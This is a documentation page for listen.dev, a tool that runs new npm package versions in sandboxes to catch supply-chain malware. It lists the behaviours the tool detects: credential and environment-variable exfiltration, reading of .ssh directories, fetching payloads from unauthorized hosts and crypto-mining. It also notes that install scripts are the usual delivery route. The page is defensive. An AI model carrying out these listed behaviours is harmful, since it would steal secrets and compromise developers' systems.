Analysis Engine
Detection Approach

Detection approach

listen.dev is powered by a best-in-class threat detection engine that use a mix of techniques such as runtime monitoring and behavioural analysis to detect adversarial activity at the earliest stages, before it impacts your systems.

How does the detection work?

We maintain an index of packages published on open source package registries (such as npm) and constantly monitor them through our analysis pipeline and threat research team.

  • We observe every new package version that gets published upstream, and analyze its behaviour inside sandboxed environments on our infrastructure.
  • We also keep a track of any behavioral changes between subsequent releases of a package, and flag any tampering or suspicious updates in newly published versions.
  • Provide information to users capturing relevant context (such as execution traces and priority levels) on detected behaviors.

listen.dev does not only flag malicious packages and alert users before they consume it in their downstream environments, but also delivers context on how third-party components behave and interact with their systems. This knowledge enables teams to develop a comprehensive understanding of their supply chain risks and maintain a proactive security posture.

What kind of harmful behaviours does it detect?

We watch for common attack vectors and known indicators of harmful behavior including:

  • Spawning of suspicious child processes
  • Sensitive data/credential exfiltration (e.g malicious code exfiltrating environment variables or secrets)
  • Suspicious network connections (e.g. pulling a malicious payload from an unauthorized source)
  • Suspicious filesystem access (e.g. tampering/reading contents of sensitive directories such as .ssh)
  • Detection of crypto-mining activity

Our starting coverage is on threats that trigger during the installation/build phase, which is the stage where 3rd party open source code gets bundled with internal application code.

The most common method for malware delivery on npm is through the install scripts which allow for arbitrary code execution on host systems. According to 2022 paper (opens in a new tab), 94% of malicious packages contained at least one install script. Read more about this attack vector in this blog post (opens in a new tab).

Check out our roadmap for what threat vectors we'll be covering in future releases. If you have any specific requests or feedback, please reach out to us.

What kind of attacks does it prevent against?

listen.dev provides the first line of defense against a range of known and unknown supply chain threats, including:

  • Typo-squatting
  • Dependency confusion
  • Dependency poisoning through malware injection
  • Package & maintainer hijacking
  • etc.

Why traditional approaches aren't sufficient against supply chain attacks?

The supply chain threat landscape is evolving rapidly, with today's adversaries using increasingly sophisticated and novel methods to craft attacks. Conversely, the security tooling industry hasn't kept up.

  • Traditional dependency scanners and SCA tools work by referencing databases of known and publicly disclosed vulnerabilities (CVEs) and your security depends on how updated these databases are.
  • If a package contains unknown vulnerabilities (e.g. a recent backdoor, malware or zero-day) it is in most cases already too late to contain the harm as some of these databases are updated after the information is publicly available.

Finding and patching only known vulnerabilities in your dependencies is a reactive approach and does not provide sufficient defense against modern supply chain attacks. Read more about the difference between known vulnerabilities and supply chain attacks in this blog post (opens in a new tab).

VerdictsThreat Coverage